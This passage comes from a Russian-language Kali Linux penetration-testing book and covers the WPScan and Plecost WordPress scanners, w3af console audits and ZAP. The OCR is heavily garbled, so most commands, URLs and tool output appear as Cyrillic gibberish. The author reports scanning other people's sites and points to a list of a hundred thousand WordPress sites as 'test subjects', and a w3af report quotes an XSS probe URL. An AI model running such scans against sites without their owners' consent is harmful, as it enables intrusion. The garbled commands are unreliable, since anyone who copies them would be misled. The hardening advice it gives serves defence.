Веіегепсе: Иіірз ://\л/рѵи!псІЬ .сот/ѵиіпе гаЬіІіііез/6625 

Веіегепсе: Иіір ://ѵіеЬ .пѵсі .пізі .доѵ/ѵіе\л//ѵи1п/с!еіаіі?ѵи!пІсІ=СѴЕ-2013-2008 
Веіегепсе: Иіір://озѵс!Ь.огд/92831 
[ і] РіхесІ іп: 1.3.1 

Тіііе: Ѵі/Р Зирег СасИе 1.3 - ігипк/рІидіпз/зеагсИепдіпе.рИр ІШ ХЗЗ 
Веіегепсе: Иіірз ://іл/рѵи!псІЬ .сот/ѵиіпе гаЬіІіііез/6626 

Веіегепсе: Иіір ://ѵіеЬ .пѵсі .пізі .доѵ/ѵіе\л//ѵи!п/сІеіаі1?ѵи1пІсІ=СѴЕ-2013-2008 
Веіегепсе: Иіір://озѵс!Ь.огд/92830 
[і] РіхесІ іп: 1.3.1 

Тіііе: Ѵі/Р Зирег СасИе 1.3 - ігипк/ріидіпз/сіотаіп-тарріпд.рИр ІШ ХЗЗ 
Веіегепсе: Иіірз :/Л\/рѵи1псІЬ .сот/ѵиіпе гаЬіІіііез/6627 

Веіегепсе: Иіір ://ѵіеЬ .пѵсі .пізі .доѵ/ѵіе\л//ѵи1п/сІеіаі1?ѵи1пІсІ=СѴЕ-2013-2008 
Веіегепсе: Иіір ://озѵсІЬ .огд/92829 
[ і] РіхесІ іп: 1.3.1 

Тіііе: Ѵі/Р Зирег СасИе 1.3 - ігипк/рІидіпз/ЬасІЬеИаѵіоиг.рИр ІШ ХЗЗ 
Веіегепсе: Иіірз ://\л/рѵи!псІЬ .сот/ѵиіпе гаЬіІіііез/6628 

Веіегепсе: Иіір://\ѵеЬ .пѵсі.пізі .доѵ/ѵіеіл//ѵи!п/сІеі аіі ?ѵи!пІс1=СѴЕ-2013-2008 
Веіегепсе: Иіір://озѵс!Ь.огд/92828 
[і] РіхесІ іп: 1.3.1 

Тіііе: Ѵі/Р Зирег СасИе 1.3 - ігипк/ріидіпз/аіл/аіііпдтосіегаііоп.рНр ІШ ХЗЗ 
Веіегепсе: Иіірз:/Лфѵи1псІЬ.сот/ѵиіпегаЬіІіііез/6629 

Веіегепсе: Иіір ://ѵіеЬ .пѵсі .пізі . до ѵ/ѵіе\л//ѵи!п/сІеіаі1?ѵи1пІс1=СѴЕ-2013-2008 
Веіегепсе: Иіір://озѵс!Ь.огд/92827 
[і] РіхесІ іп: 1.3.1 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


На другом сайте и ѴѴогсІРгезз и все плагины оказались свежими. Но интересные вещи 
были найдены и там: 

• каталог /ргоху/асІтіп.рНр, в котором оказался СІуре; 

• и во всех каталогах с плагинами папки оказались открыты для листинга, т. е. 
например, \л/р-соп1:еп1:/рІи§іп5/\л/огсІрге55-Ьаскир-1:о-сІгорЬох/. Конечно, в самих 
каталогах я ничего интересного не нашёл, но сам факт этой ошибки говорит о 
том, что сервер настроен не совсем правильно и можно продолжить копать в 
сторону других ошибок в конфигурации сервера. Это обусловлено тем, что тот 
сайт расположен на ѴР5 (как правило, там самому нужно всё устанавливать и 
настраивать). 

РІ6С05І 


Вторая программа также сканирует ѴѴогсІРгезз на наличие уязвимых плагинов. Главная 
её проблема в том, что её базы устарели (в феврале будет два года, как базы не 
обновлялись). Хотя между предпоследним и последним обновлениями тоже прошло 
больше года, поэтому даже не знаю, считать ли программу заброшенной. Как 
следствие, у этой программы появились проблемы с определением версий и т. д. Тем 
не менее, она работает и можно проверить сайт ещё и по ней. 


Внимание: произошло обновление, подробности в статье « Новая версия РІесозі 1.0.1 — 
программы для поиска уязвимостей ѴѴогсІРгезз ». 

Первый запуск этой программы меня озадачил — требовалось обязательное указание 
ключа -і, после которого обязательно должен быть указан файл с плагинами. Никакой 
информации о том, где этот файл находится нет. Поэтому я нашёл его в файловой 
системе Каіі Ыпих по адресу //изг/5Ііаге/рІесо$1:/\л/р_рІи§іп_ІІ5І:.Ш (позже я его нашёл 
ещё на официальном сайте). В общем каждый запуск этой программы должен 
начинаться строчкой ріесозі: -і //изг/зИа ге/рІесозТ/ѵѵр_рІи§іп_Іі5І:.1:х1:, после которой 
через пробел пишется адрес сайта. Например: 


1 


ріесозі: -і //изг/зІіаге/рІесо5І:/ѵѵр_рІи§іп_Іі5І:.1:х1: ѵѵеЬѵѵаге.Ьіі 


Вывод для одного из просканированных сайтов (не для моего): 


[і] Могфгезз ѵегзіоп ГоипсІ: 3.9.3 
[і] Могфгезз Іазі риЫіс ѵегзіоп: 4.1 


[*] ЗѳагсЬ Гог іпзіаііесі ріидіпз 


[і] Ріидіп ГоипсІ: аіі-іп-опе-зео-раск 
|_І_аРѳзГ ѵегзіоп: 1.6.12.2 

_ Іпзіаііесі ѵегзіоп: Ггипк 

[і] Ріидіп ГоипсІ: доодІе-зіГѳтар-депегаіог 
|_І_аіезГ ѵегзіоп: 3.2.4 

_ Іпзіаііесі ѵегзіоп: 4.0.7 

[і] Ріидіп ГоипсІ: іл/р-зирег-сасНе 
ЦІ-аіезі ѵегзіоп: 0.9.9.6 

|_ Іпзіаііесі ѵегзіоп: 1.4.2 

[і] Ріидіп ГоипсІ: ѵѵр-радепаѵі 
|_І_аіезі ѵегзіоп: 2.73 

_ Іпзіаііесі ѵегзіоп: 2.87 

[і] Ріидіп ГоипсІ: ѵ/р-роііз 
Ц-аіезі ѵегзіоп: 2.60 

_ Іпзіаііесі ѵегзіоп: 2.68 

[і] Ріидіп ГоипсІ: ііпутсе-асіѵапсесі 
Ц-аіезі ѵегзіоп: 3.2.7 

_ Іпзіаііесі ѵегзіоп: 3.4.2 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


После того, как найдены уязвимые плагины, можно перейти к МеТазрІоіІ: Ргатеѵѵогк и 
зеагсбзріоіі:, либо на ТНе ЕхрІоН РаіаЬазе — сайт по поиску эксплойтов. Ещё сайты с 
самыми свежими эксплойтами: \Л/Р5сап ѴиІпегаЫІИу РаіаЬазе (свежая база эксплойтов 
для ѴѴогсІРгезз) и Раскеі: $1:огт (самые разные свежие эксплойты). 

Выводы (рекомендации по защите \Л/огс1Рге55) 

1. Обязательно обновляйте и ѴѴогсІРгезз и каждый плагин (благо это очень просто 
делается из веб-интерфейс). 

2. Настоящим прозрением для меня стал тот факт, что плагины, которые 
деактивированы в админке \А/огсІ Ргезз, прекрасно видны для сканеров (ведь 
сканеры напрямую обращаются к файлам-маркерам) и, весьма вероятно, 
уязвимы для экспуатации. Т.е. если вы не используете какие-либо плагины, то 
не просто деактивируйте их, а удалите. 

3. Идентичная ситуация с темами для ѴѴогсІ Ргезз: в зависимости от функционала и 
подверженности к уязвимостям, некоторые темы позволяют скачивать с сервера 
и закачивать на сервер произвольные файлы. Это не просто теория. В одном из 
ближайших уроков я продемонстрирую примеры уязвимостей в темах 
ѴУогбРгезз . Причём, эти уязвимости, как правило, на уровне "детских" взломов. 
Поэтому: а) всегда обновляйте темы, когда выходят обновления; б) удаляйте 
неизпользуемые темы. 

4. На одном из сканируемых сайтов сканирование продолжалось очень долго 
(более 30 минут, хотя на других сканер управлялся за несколько минут). Я 
связываю это с какими-то настройками по максимальной частоте обращения к 
сайту (или серверу). Это хорошая идея, если она не мешает работе сайтов и не 
доставляет неудобства пользователям. 

5. Сканируйте свои сайты! Каіі Ыпих создаётся не для хакеров! Точнее, не только и 
не столько для них. Все программы, которые присутствуют в Каіі Ыпих, можно 
установить на любой Ыпих. Более того, некоторые из них являются 
кроссплатформенными. Если авторы того или иного плагина или темы 
забросили своё детище, а в нём были найдены уязвимости, то для вас нет 
другого способа узнать, что на вашем сервере размещён уязвимый скрипт. Т.е. 
вы можете столкнуться уже с результатом — взломом сайта — и уже тогда 
понять, что где-то есть уязвимый скрипт, но, думаю, вас это не очень устраивает. 
И ещё рекомендация, если вы пользуетесь плагином (или темой) в ранних 
версиях которых присутствовали уязвимости, то мой совет поискать 
альтернативу от других авторов. По моим наблюдениям, одни и те же плагины, 
в разных своих версиях подвержены новым уязвимостям, или одна версия 
подвержена мульти уязвимостям. Т.е., говоря простым языком, если у автора 
плагина руки растут не из того места (ну или он просто не задумывается о 
безопасности своих программ), то вероятность "пересадки" рук в нужное место, 
обычно, невелика. 


Глава 38. Новая версия РІесозІ 1.0.1 — программы для поиска 
уязвимостей Ѵ\/огсІРге$5 

Подготовлено на основе справочной информации из КаІІ.ТооІз 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Про РІесозІ мы уже писали (« Сканируем на уязвимости ѴѴогсі Ргезз: \Л/Р5саппег и 
РІесозІ»), В той статье указывается, что проект давно не обновлялся, а для ѴѴогсІРгеБЗ, 
которая обновляется быстро и автоматически или с помощью простых действий в 
графическом интерфейсе, все не обновляемые сканеры быстро «протухают» и 
становятся бесполезными. 

Не так давно автор РІесозІ; показал нам третью версию своей программы, которая 
получила номер 1.0.1. 

Новое в РІесозІ 1.0.1: 

• Исправлены ошибки. 

• Новый движок: более быстрый и для него нужно меньше памяти. 

• Улучшена система СѴЕ и хранения: теперь РІесозІ получает уязвимости 
напрямую от N151 и создаёт локальную базу 5ЦШе с отфильтрованной 
информация для ѴѴогсІРгезз и его плагинов. 

• Уязвимости ѴѴогсІРгезз: теперь РІесозІ также работает с уязвимостями ѴѴогсІРгезз 
(а не только его плагинов). 

• Локальная база данных уязвимостей поддерживает запросы. Теперь по ней 
можно искать для конкретной версии ѵѵогсІргезз или плагина. 

• Ну а все изменения в файле СНАМОЕЮО. 

Установка РІесозІ 1.0.1 


В Каіі Ыпих РІесозІ уже установлен. НО: на данный момент в Каіі до сих пор старая 
версия, которая уже мало интересна. Я покажу установку на примере дистрибутива 
ЫѴЮЕ 2 (аналогично делается в ЭеЫап, Мі пТ, ІІЬипІи). 


1| 

зисіо арТ-§е1: іпзіаіі руіІіопЗ-рір ру1:ЬопЗ-сІеѵ ру1:ЬопЗ-ѵѵІтееІ 

2 1 

5исІо руіИопЗ -т рір іпзіаІІ рІесозІ: 


Работа с РІесозІ 1.0.1 


тіа\@тіпТ - 5 рІесозТ 

/////////////////////////////////////////////////////// 


// . 0МІ... 

// .: ММММ. 

// .5МММММ:. 

// .м.м, =мммммммммо. 

// .МММ . . . МИММММММММММ. 

// .ммммммммммммммммм-. 

// .ИМИИММНННИМММММ. 

// _7 Н ННННННИНННННМНИЯ. 

// .?.мммммммммммммммммммммм. 

// . мммммммммммммг-т. 

// 7 МММММММММММММО N 5. 

// 2ММММММММММММММММММ.ІІЬз. 

// .:МММММММ2-7МММММММММ0. 

// - ~+: . 

// 

// РІесозІ: - Могсіргезз 'Гіпдег ргіпііег Тооі - ѵІ.Э.Ѳ 
// 

// Оеѵеіорегі Ьу: 

// Ргапсізсо Зезиз Сотег ака ^гапг | (ЭРРгапг - {Тгапг-[аі]-іпідиа.сот 

// Рапіе! Сагсіа ака сгѲНп | @ддсіапіе1. - сгѲЬп- [аС] -сгѲЬп. сот 

// 

// Іп^о: Ы:1:р://іпідиа. сот/1аЬ5/ 

// Керо: Мігрз : //діІЬиЬ. сот/іпідиа/ріесозі: 

// Вид герогі:: ІіЬз@іпідиа. сот ог М:1:р5://ді1:ЬиЬ.сот/іпідиа/рІесо5І:/І55ие5/ 


[!] Ѵои тизі: зресі^у а ѵаіісі Ігагдеі:. Туре ’-Ь' Тог Ьеір. 
тіа1@тіпТ - $ | 
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Сканирование теперь запускается элементарной командой: 


1| 

ріесозі Ыір://5ІТЕ.сот 

Чуть более сложное сканирование: увеличиваем подробность и экспортируем 
результаты в форматах 150ІЧ и ХМІ_: 

150ІЧ 


11 

ріесозі -ѵ 1іІІр://8ІТЕ.сот -о гсзикз.|зоп 

ХМІ. 

1| 

ріесозі -ѵ Ыір://5ІТЕ.сот -о гезиііз.хті 


Продвинутые опции сканирования РІесозІ 1.0.1 


Без проверки версии ѴѴогсІРгезз, только плагинов: 


рІесозТ -пс Ыір://5ІТЕ.сот 


Всё равно сканируем, даже если это не ѴѴогсІРгезз: 


ріесозі -I Ыір://5ІТЕ.сот 


Отображать только короткий баннер: 


ріесозі -пЬ Ыір://5ІТЕ.сот 


Список доступных ѵѵогсі МзТз: 


1| 

тіаІ@тіп1 ~ $ ріесозі -пЬ -1 

2 1 

// РІесо5І - ѴѴогсІРгезз 1іп§ег ргіпіег ТооІ - ѵі.0.0 

3| 

АѵаіІаЫе ѵѵогсі Іізіз: 

4| 

1 - рІи§іп_Ііз1_50.1х1 

5 1 

2 - рІи§іп_Ііз1_1000.1х1 

6| 

3 - рІи§іп_Ііз1_100.1х1 

71 

4 - рІи§іп_Ііз1_250.1х1 

81 

6 - рІи§іп_Ііз1_Ііи§е.1х1 

91 

7 - рІи§іп_Ііз1_10.1х1 

101 

тіаІ@тіп1 ~ $ 


Выбираем ѵѵогсііізі в списке: 


1 


ріесозі -пЬ -ѵѵ рІи§іп_Ііз1_10.1х1 Ыір://5ІТЕ.сот 


Повышение параллелизма (ИСПОЛЬЗОВАТЬ ОСТОРОЖНО, МОЖЕТ ПОЛОЖИТЬ 
ТЕСТИРУЕМЫЙ ВЕБ-САЙТ!) 


1 


ріесозі --сопсиггепсу 10 Ыір://5ІТЕ.сот 


Или: 


1 


ріесозі: -с 10 Ыір://5ІТЕ.сот 


Ещё больше опций по команде — Неір: 


1 


ріесозі -б 
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Обновление РІесо$і 

Новые версии и уязвимости открываются ежедневно, вы можете загрузить их в 
локальную базу: 

Обновление базы данных уязвимостей: 


1| 

$исІо ріесозі: -ирсіаіе-сѵе 

Обновление списка плагинов: 

1| 

зисіо рІесозТ — ирсІаТе-рІиёіпз 


Чтение локальной базы данных уязвимостей 


Список всех известных плагинов с уязвимостями: 


1| 

тіаІ@тіп1: ~ $ ріесозі: -пЬ -5Ііоѵѵ-рІи§іп5 

2 1 

// РІесоБІ: - ѴѴогсіРгезз бп§ег ргіпіег ТооІ - ѵі.0.0 

3| 

[*] РІи§ІП5 ѵѵіТЬ ѵиІпегаЬіІІІІез кпоѵѵп: 

4| 

{ 0 } - аЬ_§оо§Іе_тар_1:гаѵеІ 

51 

{1} - асоЬо1:_Ііѵе_сІіа1:_%26_соп1:ас1:_-і : огт 

6| 

{ 2 } - асТіѵеІпеІрег_ІіѵеНеІр_Ііѵе_сІпа1: 

71 

{ 3 } - ас)-тапа§ег 

81 

{4 } - аіірау 

91 

{ 5 } - аІІ-ѵісІео-§аІІегу 

10 


{ 6 } - аІІ_іп_опе_$ео_раск 

11 


{ 7 } - аІІ_іп_опе_ѵѵогсІрге55_5есигі1:у_апсі_Тіге\л/аІІ 

12 


{ 8 } - апо1Ііег_\л/огсІрге55_сІа55И : іесІ5_рІи§іп 

13 


{ 9 } - апуіопі 

14 


{10 } - аргіІ%275_5ирег_1ипс1:іоп5_раск 

15 


{11} - аисІіо_рІауег 

16 


{12 } - Ьаппег_е1Тес1:_ІіеасІег 

17 


{13 } - Ьаппегтап 

18 


{14 } - ЬіЬ2Ы:тІ 

19 


{15 } - Ьіс_тесІіа_ѵѵісІ§е1: 

20 


{16 } - ЬігсН'еесІег 

21 


{17 } - Ыо§5ІапсІ-5таг1:-Ьаппег 

22 


{18 } - Ыие_ѵѵгепсІі_ѵісіео_\л/ісі§е1: 

23 


{19 } - Ьоокх 

24 


{ 20 } - Ьгас)е5со_§а1:е\л/ау 

25 


{ 21} - Ьзк-рсИ^тапа^ег 

26 


{ 22 } - Ьиііеіргоо^-зесигііу 
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271 

{ 23 } - ЬиІІеіргоо^зесигНу 

281 

{ 24 } - сакИю 


Показать уязвимости по конкретному плагину: 


1 


ріесозі: -пЬ -ѵр §оо§Іе_апаІу1:іс5 


Показать подробности по конкретной СѴЕ: 


1 


ріесозі: -пЬ -сѵе СѴЕ-2014-9174 


Нужны подопытные? Список ста тысяч веб-сайтов на ѴѴогсІРгезз . 


Глава 39. Работа с ѴѴЗаТ в Каіі Ыпих 


Это вольный перевод статьи Ьіір://репіе5іегсопіе55Іоп5.Ыод5роі.ги/2007/10/Ьо\м-іо- 
изе-шЗаЕ-іо-аисІіі-ѵѵеЬ.НітІ по работе в ѵѵЗа/. 

Перевод прислал Епіезі, спасибо ему, что поделился с нами этим материалом! 

Введение 

\А/За^ (\Л/еЬ АррІісаТіоп АНаск апб АисМТ Егатеѵѵогк) — это ореп-зоигсе сканер веб- 
уязвимостей. 

Этот сканер имеет как графический интерфейс, так и возможность работы из-под 
консоли. В общем, это фреймворк с большим количеством различных плагинов. 

В данной статье будет описано как осуществить проверку веб-приложения на 
уязвимости Х55, С5ВР и 5цІі работая в ѵѵЗаІ" из под консоли. 

Как пользоваться \Л/ЗаТ 


Для запуска \Л/ЗаТ в консольном виде надо открыть терминал и напечатать: 


ѵѵЗаР сопзоіе 


Для того чтобы посмотреть список всех опций напишем: 


\л/ЗаР>» Неір 


И получим: 


1| 

зГагГ 

Запустить сканирование. 

21 

рІи§іп$ 

Включение и настройка плагинов. 

3| 

ехріоіі: 

Эксплуатировать уязвимость. 

4| 

ргоРіІез 

Показать список и использовать профайлы сканирования. 

51 

сіеапир 

Очистить перед началом нового сканирования. 

6| 



71 

Ітеір 

Показать помощь. Наберите: Иеір [команда] , чтобы увидеть больше 
помощи по конкретной "команде" 

81 

ѵегзіоп 

Показать информацию о версии ѵѵЗаЕ 

91 

кеуз 

Показать сочетания клавиш. 

10| 
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111 

Ы:1:р-5е1:1:іп§5 

Задать НТТР настройки фреймворка 

121 

тІ5с-5е1:1:іп§5 

Изменить остальные настройки ѵѵЗаТ 

131 

Таг§е1: 

Настроить целевой ЫВЬ. 

141 



151 

Ьаск 

Вернуться в предыдущее меню 

161 

ехіТ 

Выход из ѵѵЗаТ 

171 



181 

кЬ 

Просмотреть уязвимости, доступные в Базе Знаний. 


Прежде всего надо сказать как настроить ѵѵЗаі" для работы. 

Для выбора опции достаточно напечатать ее название, для того чтобы вернуться к 
предыдущему уровню следует напечатать "Ьаск". 

Если напечатать команду "ѵіеѵѵ" то на экран будет выведен список настраиваемых 
параметров выбранной опции. 

Теперь рассмотрим опцию "Тагмет". В ней задается ІІКІ. для проводимой проверки. 
Настройка опций: 


1| 

ѵѵЗа^» 1аг§е1: 

21 

\л/За1Усоп1ч§:1:аг§е1:»> Ьеір 


Для данной опции доступны следующие параметры: 


1| 

ѵіеѵѵ 

Список доступных опций и их значения 

2 1 

зеі 

Установить значение параметра 

3| 

$аѵе 

Сохранить новую конфигурацию 

4| 



51 

Ьаск 

Вернуться в предыдущее меню 

6| 

ехіі 

Выйти из ѵѵЗа^ 


Установим ІІРЯдля проверки: 


1| 

\л/За1УсопЬ§:1:аг§е1:»> 5еІ Таг§еТ Ыір://ІосаІЬо5І: 

21 

\л/За1Усоп1ч§:1:аг§е1:»> ѵіеѵѵ 


Для дальнейшей работы необходимо настроить плагины: 


1| 

\л/За1Усопб§:1:аг§е1:»> Ьаск 

21 

ѵѵЗа^» рІи§ІП5 

3| 

ѵѵЗаѴрІи§іп5»> Ьеір 
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1| 

ІІ5І 

Список доступных плагинов 

21 



3| 

Ьаск 

Перейти к предыдущему меню 

4| 

ехі1 

Выйти из ѵѵЗа^ 

51 



6| 

§гер 

Просмотр, настройка и включение плагинов §гер 

71 

аисПТ 

Просмотр, настройка и включение плагинов аудита 

81 

еѵазіоп 

Просмотр, настройка и включение плагинов уклонения 

91 

сгаѵѵі 

Просмотр, настройка и включение плагинов обхода контента 

101 

аиіН 

Просмотр, настройка и включение плагинов аутентификации 

111 

тап§1е 

Просмотр, настройка и включение плагинов искажения 

121 

оиіриі 

Просмотр, настройка и включение плагинов вывода 

13 

Ьгиіеіюгсе 

Просмотр, настройка и включение плагинов брутфорса 

141 

іпігазігисіиге 

Просмотр, настройка и включение плагинов инфраструктуры 


Для аудита веб-приложения нам потребуется настроить как минимум четыре плагина. 

Аисііі, сгаѵѵі, іп^газігисіиге и оиіриі. 

Если мы напечатаем аисііі, то увидим все доступные настройки для этого плагина, 
такие как Х55, С5Г^, $цІ и Ісіар инъекции и т.д. Кроме этого там также указано какие из 
настроек в данный момент включены. 


Для включения определенных настроек следует напечатать: 


1 


\л/ЗаѴрІи§ІП5>» аисШ Х55,С5гТ,5рМ 


Для выбора всех настроек: 


1 


\л/ЗаѴрІи§ІП5>» аисПТ аІІ 


Нам как раз и нужно проверить веб-приложение на эти уязвимости. Кроме того мы 
хотим чтобы результат проверки отображался в консоли и был сохранен в виде НітІ. 

Для этого включим необходимые плагины сгаѵѵі и оиіриі:: 


1| 

\л/ЗаіУрІи§іп5»> сгаѵѵі ѵѵеЬ_зрісІег,рук1:о 

21 

\л/ЗаіУрІи§іп5»> іпітазігисіиге Іітар 

3| 

\л/ЗаіУрІи§іп5»> оиіриі сопзоІе^ІтИпІе 


Немного информации об используемых плагинах: 

\Л/еЬ_зрісІег — Плагин представляет из себя классического ѵѵеЬ-паука. Он бродит по 
сайту и извлекает все ссылки и адреса форм. 
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Рукіо — Плагин представляет из себя сканнер пікіо, портированный на руіНоп. Он 
использует базу данных из пікіо (зсап_сІаІаЬа5е) для поиска уязвимых ссылок. 

Нтар — Плагин опознаёт удалённый веб-сервер, его тип, версию и установленные 
исправления. 

Идентификация происходит не только через заголовок "Зегѵег". По сути плагин 
представляет из себя обёртку для Нтар Оизііп'а І_ее. 

Сопзоіе — Этот плагин пишет отчёт о работе фреймворка в консоль. 

НітІ_ІіІе — Плагин пишет отчёт о работе фреймворка в НТМЬ-файл. 

Для начала аудита выполняем следующие команды: 


1| 

\л/ЗаІ/рІи§іпз>» Ьаск 

21 

\л/ЗаІ>» зТа гТ 


Сканер работает довольно долго, так что придется запастись терпением. В итоге 
получим примерно такой отчет: 


1| 

\л/ЗаІ>» зТагТ 

21 

АиІо-епаЫіп§ рІи§іп: сіізсоѵегу.аІІо\л/есІМеіНосІ5 

3| 

АиІо-епаЫіп§ рІи§іп: сіізсоѵегу.еггог404ра§е 

4| 

АиІо-епаЫіп§ рІи§іп: сіізсоѵегу.зегѵегНеасІег 

51 

ТНе Бегѵег Неасіег Тог іНіз НТТР зегѵег із: АрасНе/2.2.3 (ІІЬипІи) РНР/5.2.1 

6| 

Нтар рІи§іп із зТагТіп§. Ріп§егргіп1іп§ тау Іаке а \л/НіІе. 

71 

ТНе тозі ассигаіе Ііп§егргіпІ Тог ТЫз НТТР зегѵег із: АрасНе/2.0.55 (ЫЬипІи) РНР/5.1.2 

81 

рукіо рІи§іп із изіп§ "АрасНе/2.0.55 (ІІЬипІи) РНР/5.1.2" аз ІНе гетоіе зегѵег Іуре. ТНіз 
іпіогтаііоп \л/аз оЬіаіпес) Ьу Нтар рІи§іп. 

91 

рукіо рІи§іп ІоипсІ а ѵиІпегаЬіІіІу аі ІІРЬ: Ні1р://ІосаІНозі/ісопз/ . ѴиІпегаЬіІІІу 
сіезсгірііоп: йігесіогу Іпс1ехіп§ із епаЫесІ, І1 зНоиІсІ опіу Ье епаЫесІ Іог зресіТіс сіігесіогіез 
(іі гециігесі). 11 іпсІехіп§ із поі изесі, іНе /ісопз сіігесіогу зНоиІсІ Ье гетоѵесі. ТНе 
ѵиІпегаЬіІіІу ѵѵаз ІоипсІ іп ІНе гециезі ѵѵііН ісі 128. 

10| 

рукіо рІи§іп Іоипс) а ѵиІпегаЬіІіІу аі ІІВЬ: Ыір://ІосаІНозі/сІос/ . ѴиІпегаЬіІіІу сіезсгірііоп: 
ТНе /ёос сіігесіогу із ЬгоѵѵзаЫе. ТНіз тау Ье /изг/сіос. ТНе ѵиІпегаЬіІіІу ѵѵаз ІоипсІ іп ІНе 
гециезі ѵѵііН ісі 1865. 

111 

рукіо рІи§іп ІоипсІ а ѵиІпегаЬіІіІу аі ІІКЬ: Ыір://ІосаІНозі/\> . ѴиІпегаЬіІіІу сіезсгірііоп: 
ТНе ІВМ ѴѴеЬ ТгаТТіс Ехргезз СасНіп§ Ргоху із ѵиІпегаЫе Іо Сгозз 5і1е 5сгір1іп§ (Х55). СА- 
2000-02. ТНе ѵиІпегаЬіІіІу ѵѵаз ІоипсІ іп ІНе гециезі ѵѵііН ісі 3385. 

121 

ІМеѵѵ ІІВЬ ІоипсІ Ьу сіізсоѵегу: Ыір://ІосаІНозі/ 

131 

ІМеѵѵ ІІКЬ ТоипсІ Ьу сіізсоѵегу: Ыір://ІосаІНозі/іез12.ЫтІ 

141 

ІМеѵѵ ІІВЬ ТоипсІ Ьу сіізсоѵегу: Ыір://ІосаІНозі/хз12.ЫтІ 

151 

ІМеѵѵ ІІВЬ ТоипсІ Ьу сіізсоѵегу: Ыір://ІосаІНозі/хз1.ЫтІ 

16 

ІМеѵѵ ІІВЫоипсІ Ьу сіізсоѵегу: Ыір://ІосаІНозі/іез1.ЫтІ 
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И результат, сохраненный в гезиІТз.ИТтІ: 





5есигі*у ІББиез апгі Ріхез 

Туре 

Рог* 

І55ие 

ѴиІпегаЬШіу 

Іср/80 

рукіо ріидіп іоипсі а ѵиІпегаЬіМу аі ІМІ.: Мір://ІосаІЬо5І/ісоп5/. ѴиІпегаЬШіу Ьезсгірііоп: Эігесіогу ігкіехіпд із епаЫей, іі зІіоиИ опіу Ье епаЫе<і Рог зресШс сіігесіогіез (іі 
гедиігесі). Іі іпсіехіпд із по! изесі, ІЬе /ісопз сіігесіогу зЬоиИ Ье гетоѵей. ТЬе ѵиІпегаЬИііу \ѵаз іоипсі іп ІЬе гедиезі ѵѵііЬ к! 128. 

ІЖІ. : Ьіірі/ЛосаІЬозі/ісопз/ 

ѴиІпегаЬШіу 

іср/80 

рукіо ріидіп іоипсі а ѵиІпегаЬібіу аі 11КЬ: МірУ/ІосаІЬозі/. ѴиІпегаЬШіу Сезспріюп: ТРАСЕ орііоп арреагз іо аііож Х55 от сгесіепііаі №еіі. 5ее 
ЬІір:/Лѵ\ѵ\ѵ.сдІ5есигііу.сотЛѵЬгіеЬаІ-тіггог/Ѵ/ЬіІеРарег_зсгееп.р<іі іог сіеіайз ТЬе ѵиІпегаЬШіу ѵѵаз іоип<І іп ІЬе гелиезі чѵііЬ к) 1322. 

ІЖІ. : Ыір://ІосаІЬо5І/ 

ѴиІпегаЬШіу 

Іср/80 

рукіо ріидіп іоипсі а ѵиІпегаЬШіу аі ІЖІ.: Ыір:/ЛосаІЬозі/<іос/. ѴиІпегаЬійу йезсгіріюп: ТЬе /Ьос сіігесіогу із ЬгоѵѵзаЬІе. ТЫз тау Ье /изг/сіос. ТЬе ѵиІпегаЬШіу ѵѵаз іоип<1 іп ІЬе 
гедиеві ѵѵііЬ й 1865. 

ІЖІ.: Ыір://к>саІЬо5і/Ьос/ 

ѴиІпегаЬШіу 

іср/80 

рукіо ріидіп іоипсі а ѵиІпегаЬШіу аі ЦРЬ: Ыір:/ЛосаІЬо5іЛ><ітд%20згс=\іаѵазсгірі:аІегі(<іоситепі.<іотаіп)\> . ѴиІпегаЬШіу сіеэсгірііоп: ТЬе ІВМ Ѵі/еЬ Тгаіііс Ехргезз СасЫпд 
Ргоху із ѵиІпегаЬІе іо Сгозз 5ііе Зсгірііпд (Х55). СА-2000-02. ТЬе ѵиІпегаЬШіу ѵѵаз іоипсі іп ІЬе гедиезі ѵѵііЬ Й 3385. 

ІЖЬ: Ьіір://ІосаІЬо5ІА><ітд%20згс='іаѵа5сгірі:аІегі(сіоситеп1.сіотаіп)\> 


сіеЬид: Киппіпд ріидіп: аІІомесіМеТЬосІБ сІеЬид: Хбб ріидіп іб ТеБТіпд: ЬТТр://ІосаІНо5Т/гіос/ІіЬдшрЗс2/ 


ЬеЬид: Ехіііпд зеіОиіриіРІидіпзО 


Глава 40. ІАРгоху: тестирование на проникновение 
веб-приложений 

ОѴѴА5Р 2есІ АНаск Ргоху (2АР) — это простой в использовании интегрированный 
инструмент тестирования на проникновения и нахождения уязвимостей в веб¬ 
приложениях. 

Он создан для использования людьми с различным опытом в сфере безопасности, и 
поэтому идеален для разработчиков и функциональных тестеров, которые новички в 
тестировании на проникновении. Но эта программа не окажется бесполезной и для 
опытных пентестеров — она найдёт своё место и в их наборе инструментов. 

Некоторые из функций 2АР: 

• Перехват прокси 

• Традиционный и АІАХ пауки 

• Автоматизированный сканер 

• Пассивный сканер 

• Принудительный просмотр 

• Фаззлер 

• Динамические 551. сертификаты 

• Поддержрка смарткарт и клиентских цифровых сертификатов (ЗтагТсагсІ и СІіепТ 
0і§і1;аІ СегііЯсаіез) 

• Поддержка веб-сокетов 

• Поддержка аутентификаций и сессий 

• Мощный КЕ5Т на основе АРІ 

• Поддержка большого количества скриптовых языков 

• Опция автоматического обновления 
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• Интегрированный дополнения и растущий маркет обновлений 
Некоторые из особенностей 2АР: 

• Открытый исходный код 

• Кросс-платформенная 

• Простая в установке (требуется ]аѵа 1.7) 

• Совершенно бесплатная (нет платы за 'Рго' версию) 

• Приоритетом является простота в использовании 

• Всесторонняя справка 

• Полностью интернационализована 

• Переведена на десятки языков 

• Основана на сообществе с привлечением активного поощрения 

• Активно развивается международной командой добровольцев 


Инструкция по спользованию 2АРгоху 


Всё довольно просто. Для запуска программы введите в терминал 


1 


іаргоху 


Откроется графический интерфейс. Введите адрес сайта и нажмите кнопку «Атака». 


Файл Правка Вид Анализ Отчет кбіструыенты Онлайн Справка 


% ■ О X ■ А * ■ 




1 г Быстрый старт ч I 


• Запрос | Ответ*» 


Щ= 


» 5 контексты 

СЕ ОеІаиІІ Сотлей 
• В № Сайты 


Добро пожаловать в ОѴѴА5Р 2ес1 АНаск Ргоху (2АР) 

! 2АР яаллетса простым в использовании приложение» для поиска уязвимостей а ееб-приложенияк 
| Имейте е еиду. что вы должны атаковать только приложения, для «оторы» было получено раэрешеі 
I Чтобы быстро протестировать приложение, введите его ирьадрес и нажмите «Атаковать-. 

1 ЛЧ.-адрес для ат 


